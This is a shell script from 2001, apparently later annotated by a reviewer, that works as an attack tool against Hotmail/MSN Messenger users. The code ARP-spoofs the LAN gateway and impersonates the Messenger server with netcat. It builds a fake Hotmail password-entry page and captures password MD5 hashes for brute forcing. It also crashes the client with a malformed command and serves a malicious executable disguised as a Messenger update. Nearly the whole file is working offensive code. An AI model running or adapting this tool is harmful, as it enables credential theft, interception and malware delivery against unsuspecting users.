#!/bin/sh

#
#          //
#         // neaky.sh 
#         \\
#          \\ wiss army knife for Hotmail/Messenger
#          // 
#         //
#
#
# "Spoofing/brute force/misconception/unexpected input Class Attack"
#
# 
#
# AUTHOR: Gregory Duchemin ( Aka c3rb3r )
#
# COMPANY: NEUROCOM CANADA
#           1001 bd Maisonneuve Ouest, suite 200
#           H3A 3C8 Montreal (Quebec) CANADA
#           gdn@neurocom.com
#           514 908 6800
#           http://www.securite-internet.com
#
# DATE: January 2001
#
# PURPOSE: Will spoof Hotmail/messenger server to recover user 
# hotmail/password, crash messenger client, remotely inject and 
# execute malicious exe on the victim host.
#
# NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY 
# to the limited broadcast address/IP Broadcast   
# otherwise u can still try it on your own gateway or from your provider ;)
# As a last resort, you can temporarily modify your DNS entry for the
# messenger servers.
#
# REQUIRED: This PoC needs arptool-like software (to send the ARP replies) and a local web server to work properly.
#          =================================================================


##########################################################################################
#
# THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY 
#
##########################################################################################

 
###################################
# Things to be configured first
###################################
#
# Every setting is a plain shell variable; they are exported together at
# the end of this section because the protocol automaton runs in a
# subshell piped into nc and the generated CGI/handler code reads them.

# Pause between protocol replies, in microseconds (consumed by usleep).
delay=100000

# Address of the Messenger notification server to impersonate.  Clients
# do not all talk to the same one: sniff the client to find its server,
# or alias one virtual IP per server address you observe.
messenger="64.4.13.56"

# Apache CGI and document roots the fake login page and its assets are
# written into.  A trailing slash is expected: paths are concatenated
# directly onto these.
cgiroot="/usr/local/apache/cgi-bin/"
httproot="/usr/local/apache/htdocs/"

# Executable served as a "Messenger update" in mode 4.
# NOTE(review): only the mode-4 existence check uses malicious_path; the
# copy in html_cleaner resolves $malicious against the current directory.
malicious_path="/tmp/"
malicious="mmssetup.exe"

# Request path of the fake login CGI: deliberately noisy so the real
# target is hard to pick out of the URL.  Contains '+' and '=' but no
# whitespace or glob characters, which the unquoted uses below rely on.
relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother"

# Messenger notification port the nc listener binds to.
PORT=1863

# This host's real address; embedded in every URL handed to the client.
MYIP="192.168.10.17"

# Unread-message count advertised to the client; must be at least 1 so
# the client actually fetches the "inbox" URL.
nrmsg="10"

# Unread-folder count advertised to the client.
nrfld="0"

# Intended location for captured passwords.
# NOTE(review): nothing in this script writes to this path -- mode 2
# appends to /tmp/md5-password and mode 1 never writes a password file.
PASSWORD_HERE="/tmp/hotmail-pass"

# ARP spoofer/flooder binary; invoked by this name and later killed by it.
ARP="arptool"

export delay messenger cgiroot httproot malicious_path malicious relogin \
       PORT MYIP nrmsg nrfld PASSWORD_HERE ARP

##########################################
# End of configuration options
##########################################


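#######################################
# SIGINT handler: tear down what the run set up, then exit.
# Globals:  ARP (read), TID (read; PID recorded when the spoofer was
#           backgrounded)
# Outputs:  status text on stdout
# Side effects: html_cleaner removes the fake CGI and response page (and,
#           as written, stages the mode-4 executable under httproot);
#           stops the ARP spoofer; always exits the script.
# NOTE(review): the original only ran `killall "$ARP"`, which signals
#           every process with that name, not just the one this script
#           started.  The recorded PID is tried first; the name-based kill
#           is kept as the fallback for when the PID is unknown or gone.
#######################################
handl3r()
{
  echo
  echo "Job finished, hope everything is ok...."
  echo "see ./log for details."
  echo
  html_cleaner
  sync
  if [ -n "$TID" ] && kill "$TID" 2>/dev/null; then
    :
  else
    killall "$ARP"
  fi
  exit
}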


#######################################
# Print the command-line help.
# Arguments: none ($0 is used as the program name)
# Outputs:   mode list, setup notes and per-mode summary on stdout
#######################################
usage()
{
  # The usage line keeps the original trailing blank and two empty lines.
  printf '\nUsage: %s [MODE] \n\n\n' "$0"
  cat <<'EOF'
MODE:   1 /  Hotmail web spoof for clear password recovery.
        2 /  Hotmail weakenned MD5 password Hash recovery for bruteforce.
        3 /  Messenger Remote CrAsh.
        4 /  Remote injection of malicious exe.


NOTE: Don't forget to customize settings in the script (the first lines).
NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel.
NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !

DETAILS: attack 1/ will trojanize victim to get back a plain password.
         attack 2/ will ask for weak md5 hash.
         attack 3/ will crash the client.(exploitable b.overflow ?)
         attack 4/ will upload a fake update, naively installed.

have a nice day
                   Gregory Duchemin ( c3rb3r@hotmail.com )


EOF
}

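# ---- argument handling ------------------------------------------------
# Exactly one argument, the attack MODE (1..4), is expected; anything else
# prints the usage text and stops.
# NOTE(review): the original only tested `[ $MODE -gt 4 ]`, so 0, negative
# and non-numeric values slipped through (a non-numeric value made `[`
# print an error and the script simply carried on with that MODE).
if [ $# -lt 1 ]; then
  usage
  exit
fi

export MODE="$1"

case "$MODE" in
  1|2|3|4)
    ;;
  *)
    usage
    exit
    ;;
esac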

# IP_forwarding should be set to avoid detection/suspicion.
# (Presumably: once the ARP replies below redirect the victim through this
# host, forwarding keeps all traffic not aimed at the faked Messenger
# address flowing, so nothing else breaks for the victim.)
# NOTE(review): `sysctl -w` needs root and a Linux kernel.  On failure the
# status is normally 255 (127 when sysctl is absent), so the `-eq 1` test
# below almost never fires and the warning is not printed.

sysctl -w net.ipv4.conf.all.forwarding=1

if [ $? -eq 1 ]; then
usage
echo
echo
echo "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script."
echo
echo
fi

# automatic configuration of arp broadcasting/spoofing over the Lan.
# The arptool command line is assembled from net-tools output:
#   - source MAC:   the first "HWaddr" value printed by `ifconfig -a`;
#   - destination:  FF:FF:FF:FF:FF:FF (broadcast);
#   - IP to claim:  the gateway column of every "UG" route in `netstat -rn`;
#   - source IP:    the first "inet" address printed by `ifconfig -a`.
# This only works with the classic net-tools output format ("HWaddr",
# "inet addr:"); other formats yield empty arguments.
# NOTE(review): `2>&1 > /dev/null` sends stderr to the terminal and only
# stdout to /dev/null.  Because the command is backgrounded with `&`, the
# `$?` tested right after is the status of launching the job (always 0),
# not of arptool itself -- the "I need something like arptool" error can
# never trigger.
echo
echo -n "ARP broadcast : "
$ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2  2>&1 > /dev/null &

if [ $? -eq 1 ]; then
usage
echo
echo
echo "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script."
echo
echo
exit
fi
echo "OK"
# PID of the backgrounded spoofer.  Recorded but not used by the SIGINT
# handler, which kills the spoofer by name instead.
export TID=$!

# ---- per-mode banner ----------------------------------------------------
# Only one arm can match.  Mode 4 additionally refuses to start when the
# executable it is going to serve is missing.
# NOTE(review): the mode-1 text is inaccurate -- nothing in this script
# writes /tmp/clear-password.  The fake form submits the PASSWORD field by
# GET to /response.html on this host, so it would only show up in the web
# server's request log, if that is enabled.
case "$MODE" in
  2)
    printf '\n%s\n\n\n' "Weak MD5 hashes will be stored in /tmp/md5-password"
    ;;
  1)
    printf '\n%s\n\n\n' "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password"
    ;;
  3)
    printf '\n%s\n\n\n' "Remote client may suddenly die...."
    ;;
  4)
    # path + "/" + name, exactly as before (a double slash with the default
    # "/tmp/" prefix, which the kernel ignores).
    if [ ! -f "$malicious_path/$malicious" ]; then
      printf '\n%s\n\n\n' "Please first define the trojan (in the configuration section)"
      exit 0
    fi
    printf '\n%s\n\n\n' "Remote Injection of junky data."
    ;;
esac

# Ctrl-C runs the cleanup handler.  INT is the POSIX spelling of the
# signal name; bash accepts SIGINT as well.
trap handl3r INT

#######################################
# Write the fake "re-enter your password" page as a CGI script.
# Globals: cgiroot, relogin, MYIP, httproot (read)
#          /tmp/.mail (read): the e-mail address the client announced in
#          "USR ... I"; written by the USR handler just before this call.
# Outputs: $cgiroot/$relogin -- a /bin/sh CGI that cats a fixed HTML page
#          (Content-type header, Hotmail look-alike password form) with the
#          victim's address spliced in between "<b>&lt;" and "&gt;</b>";
#          made executable.
#          $httproot/response.html -- the page the form submits to.
# Notes:
#   - the form uses method=GET to http://$MYIP/response.html, so the
#     PASSWORD field travels in the query string; this script never stores
#     it (it would only appear in the web server's request log).
#   - the images are fetched from c3rber.multimania.com, a third-party host
#     the page depends on and which sees a request for every victim.
#   - the page text passes through `echo -n -e`, so \n and \" are handled by
#     the shell/echo before the CGI is written; the CGI itself uses a plain
#     heredoc (__MYGIFT__).  The unescaped `alt=""` on the first image closes
#     and reopens the shell string, so the generated HTML reads `alt=>`.
#   - `function` is a bash keyword, not /bin/sh.
# NOTE(review): /tmp/.mail is a fixed, predictable path; the CGI file name
#   contains '+' and '=' and is used unquoted, which only works because
#   neither $cgiroot nor $relogin contains whitespace or glob characters.
#######################################
function html_builder()
{
# First chunk: CGI shebang, the `cat << __MYGIFT__` that turns the rest
# into a heredoc, and the page up to the "<" preceding the address.
echo -n -e "#!/bin/sh\n
cat << __MYGIFT__
Content-type:text/html\n
<html>
<!--
JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES
-->
<body>
<div align=left>
<div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\">
<div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\"> 
<form name=\"passwordform\"  action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td>
<a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a>
</td>
<td align=CENTER nowrap>
<img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br>
<a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td>
</tr>
<tr><td height=6></td></tr>
<tr valign=top>
<td><font class=s>
</font>
</td>
<td rowspan=4><font class=s>
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class=f size=2><b>&lt;" > $cgiroot"/$relogin"
# The victim's address, captured from "USR ... I", is spliced in here.
cat /tmp/.mail >> $cgiroot"/$relogin"
# Remainder of the page: password form, footer, background image and the
# heredoc terminator.
echo -n -e "&gt;</b></font>
<input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign=middle><font class=sbd>Password</font>&nbsp;</td>
<td><input type=password name=PASSWORD size=16 maxlength=16></td>
<td width=22 valign=\"middle\" align=\"center\">&nbsp;</td>
<td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td>
</tr>
<tr>
<td></td>
<td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>&nbsp;  
C3rb3r &copy; 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept. 
<a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a> &nbsp; 
<a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement
</font></a>
</td>
</tr>
</table>
</div>
<p align=center>
<img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 >
</div>
</div>
</body>
</html> 
\n__MYGIFT__\n\n">> $cgiroot"/$relogin"

# Make the CGI executable for the web server.
chmod a+x $cgiroot"/$relogin"
#echo "This is the false update for messenger."  > $httproot"mmssetup.exe"
# Landing page the form submits to.
echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html"
}

#######################################
# Post-session housekeeping of the web roots.
# Globals: cgiroot, httproot, relogin, malicious (read)
# Side effects:
#   - removes the fake login CGI ($cgiroot/$relogin) and response.html;
#   - creates $httproot$relogin as a world-readable/writable directory and
#     copies $malicious into it as mmssetup.exe (the path the mode-4 CVR
#     reply sends the client to).
# NOTE(review): `chmod a+rwx` leaves a world-writable directory inside the
#   document root, so any local user can drop files there that the web
#   server presumably serves.  $malicious is resolved against the current
#   working directory, not $malicious_path.
#######################################
html_cleaner()
{
  local cgi_page="$cgiroot/$relogin"
  local drop_dir="$httproot$relogin"

  rm -f -- "$cgi_page"
  mkdir -p -- "$drop_dir"
  chmod a+rwx "$drop_dir"
  cp -f -- "$malicious" "$drop_dir/mmssetup.exe"
  rm -f -- "${httproot}response.html"
}

#IP ALIAS with messenger IP
# Bind the impersonated server address to this host so the listener can
# use it as its local address (`nc -s $messenger` below).
# NOTE(review): the interface name eth0 is hard-coded here although the
# ARP step auto-detects the first interface; "OK" is printed whether or
# not ifconfig succeeded.
echo
echo -n "Interface configuration : "
ifconfig eth0:0 inet $messenger
echo "OK"


echo
echo "Waiting for a client n0w...."
echo

# things are getting serious now, this is the messenger automate:
# flag sequences the CVR exchanges of a session (0 -> 1 -> 3).  The
# automaton runs in a subshell, so its updates never reach this shell and
# every client session starts again from "0".
export flag="0"
# NOTE(review): ./trace is created here but never read or written again;
# the session transcript actually goes to ./log (see the nc redirection).
cat /dev/null > ./trace


# ---- listener / protocol automaton --------------------------------------
# Outer loop: one nc listener per client session.  The parenthesised
# subshell is the "server side": its stdout is piped into nc, so every
# `echo` inside it is a line sent to the client, while nc's stdout -- what
# the client sends -- is redirected into ./log.  The subshell polls ./log
# for recognised commands, answers them, and lowercases the verb in ./log
# so the same command is not answered twice.  When the subshell exits
# (OUT, mode-2 hash captured, mode-3 payload sent) nc sees EOF, the
# pipeline ends, and the outer loop starts a fresh listener.
#
# NOTE(review):
#   - `cat ./log | sed ... > ./log` truncates the file cat is reading
#     (both sides of the pipe start concurrently) while nc keeps writing
#     through its own descriptor; whether the transcript survives is
#     timing-dependent, which is what the $delay pauses paper over.
#   - the inner loop has no sleep on the no-match path: it busy-polls ./log
#     with one egrep per iteration until something arrives.
#   - `exit` inside the subshell ends only the subshell, never the script.
#   - usleep and egrep are not POSIX.
while true
do
sync
(
usleep  $delay 

while true
do


# One regex for every command the automaton reacts to.  All matching lines
# are collected; `echo $parsed` then flattens them, so field 1 is the verb
# and field 2 the transaction id of the FIRST unanswered command.  The
# per-command field extractions below ($3, $4, $5, $8) assume a single
# unanswered command is present in ./log at a time.
export parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)"

if [ "$parsed" != "" ]; then
sync
export request=$(echo $parsed | awk '{print $1}')
export num=$(echo $parsed | awk '{print $2}')

case "$request" in


VER)
# Client hello: answer with the dialects this fake server "supports".
# The verb is lowercased in ./log first so the line is not matched again.
usleep $delay 
cat ./log | sed -e "s/VER/ver/" > ./log
echo -e "VER $num MSNP5 MSNP4 CVR0\r" 
sync
usleep $delay 
;;

INF)

# Advertise MD5 as the authentication method.  The transaction id is
# presumably the last token of the INF line, so $num still carries the
# trailing CR; `s/.$/ /` swaps it for a space before "MD5" is appended.
cat ./log | sed -e "s/INF/inf/" > ./log
export new=$(echo $num | sed -e 's/.$/ /')
echo -e "INF $new""MD5\r" 
usleep $delay 
;;

USR)
      
# Two USR phases, told apart by field 4:
#   "I" (initial): field 5 is the client's e-mail.  Remember it, build the
#       fake login CGI for it, and send the MD5 challenge -- the current
#       epoch time, or an empty challenge in mode 2 (presumably so the hash
#       the client returns depends on the password alone; TODO confirm
#       against MSNP4/5).
#   otherwise (second phase): field 5 is the client's MD5 response.  Mode
#       2 answers with a 910 error code, appends the hash to the fixed,
#       predictable /tmp/md5-password and ends the session; every other
#       mode accepts the login ("USR ... OK").
# NOTE(review): $email is only set in the "I" branch; /tmp/.mail is a fixed
#   temp path shared with html_builder.
cat ./log | sed -e "s/USR/usr/" > ./log
export ttype=$(echo $parsed | awk '{print $4}')
if [ "$ttype" = "I" ]; then
export email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
echo "$email" > /tmp/.mail
html_builder
rm -f /tmp/.mail
if [  ! $MODE = "2" ]; then
echo -e "USR $num MD5 S "$(date "+%s")"\r"
else
echo -e "USR $num MD5 S \r"
fi
else
export password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
if [ $MODE = "2" ]; then
echo -e "910 $num \r" 
usleep $delay 
echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-password
sync
exit 
fi
echo -e "USR $num OK $email $email\r" 
fi
usleep $delay
;;


SYN)

# Contact-list sync request; field 3 (with its trailing CR stripped) is
# the client's list version.  First push a profile MSG
# (text/x-msmsgsprofile) made of hard-coded values plus a LoginTime of
# now, then echo the client's own version back in "SYN <trid> <ver>".
export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}')
cat ./log | sed -e "s/SYN/syn/" > ./log
export time=$(date "+%s") 

echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\
n: 1.0\r\nContent-Type: text/x-msmsgspro\
file; charset=UTF-8\r\nLoginTime: $time\
\r\nEmailEnabled: 1\r\nMemberIdHigh: 84\
224\r\nMemberIdLow: 1114357868\r\nlang_pre\
ference: 1033\r\npreferredEmail: \r\ncount\
ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\
 60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \
2AAAAAAA\
AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\
t3erLcBGzQ$$\r\n\r"
usleep $delay 
echo -e "SYN $num $syn\r"
usleep $delay 
sync 
;;


CVR)

# Client version report; field 8 is taken as its version string.  flag
# sequences the two CVR exchanges seen per session:
#   flag 0 (first CVR): mode 4 replies with inflated version numbers
#     (12.666.666) and a download URL under http://$MYIP/$relogin/
#     (presumably to make the client offer the "update"; TODO confirm);
#     other modes echo the client's own version with a URL on this host.
#   flag 1 (second CVR): replay the remembered CHG line (empty if none was
#     seen yet), push an initial e-mail notification MSG whose Inbox-URL
#     points at the fake login CGI, answer CVR again (mode 4: this host's
#     document root; others: a Microsoft download URL), send a few BPR
#     contact properties, and in mode 3 send an ADD with transaction id 0
#     and bogus arguments, then end the session.
#   flag 3: further CVRs are ignored.
# NOTE(review): "Get-URL: http//$MYIP" looks like a missing colon; the two
#   mode-4 download URLs differ (one under /$relogin/, one at the root).
export version=$(echo $parsed | awk '{print $8}')
cat ./log | sed -e "s/CVR/cvr/" > ./log
      
if [ "$flag" = "0" ]; then
if [ $MODE = "4" ]; then
echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
ttp://$MYIP\
/$relogin""/$malicious http://$MYIP/$relogin""/$malicious\
\r"
else      
echo -e "CVR $num $version $version 1.0.0863 h\
ttp://$MYIP/\
/mmssetup.exe http://$MYIP\
/\r"      
fi
export flag="1"
else 
if [ "$flag" = "1" ]; then
echo -e "$chg"
echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\
n: 1.0\r\nContent-Type: text/x-msmsgsini\
tialemailnotification; charset=UTF-8\r\n\
\r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\
\r\nInbox-URL: /$relogin""\r\nFolders\
-URL: /$relogin""\r\nGet-URL: http\
//$MYIP\r\n\r"
if [ $MODE = "4" ]; then
echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
ttp://$MYIP/\
mmssetup.exe http://$MYIP/\r"
else
echo -e "CVR $num $version $version 1.0.0863 h\
ttp://download.microsoft.com/download/\
msnmessenger/Patch/2.1/Win98/EN-US/msg\
strst.dll http://messenger.msn.com/\r"
fi
export flag="3"
echo -e "BPR $num C3rb3r@hotmail.com PHH\r"
echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\
 c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\
otmail.com MOB N\r"
usleep $delay
if [ $MODE = "3" ]; then
echo -e  "ADD 0 AL Crash Crash \r"
usleep $delay
exit 0
fi
fi
fi
usleep $delay 
;;



CHG)

# Presence change: keep the client's CHG line verbatim; it is replayed to
# the client during the second CVR exchange.
export chg=$( echo "$parsed"| egrep "CHG")
cat ./log | sed -e "s/CHG/chg/" > ./log
usleep $delay 
;;

OUT)
# Client is leaving: tidy the web roots and end this session (the exit
# closes nc's input, so the outer loop listens again).
html_cleaner
exit 0
;;

URL)

# Client asks where a web service lives: point it at this host, under
# /c/s.dll/$relogin.
cat ./log | sed -e "s/URL/url/" > ./log
echo -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\
\r"
usleep $delay 
;;

esac 
fi
done
)| nc -w 5 -s $messenger  -n -l -p $PORT > ./log 2>/dev/null  
# Listener: classic netcat syntax (-l -p PORT).  -s binds the aliased
# Messenger address as the local address, -n skips DNS, -w 5 is netcat's
# 5-second timeout.  Everything the client sends lands in ./log.

# After the session: report whether the transcript holds an OUT.
# NOTE(review): `! $? -eq 1` treats every grep status other than 1 as a
# match, so a missing or unreadable ./log (status 2) also prints this.
egrep -e 'OUT' ./log > /dev/null
if [ ! $? -eq 1 ]; then
echo
echo "Victim has signed out...."
echo "see ./log for details."
echo
fi

done

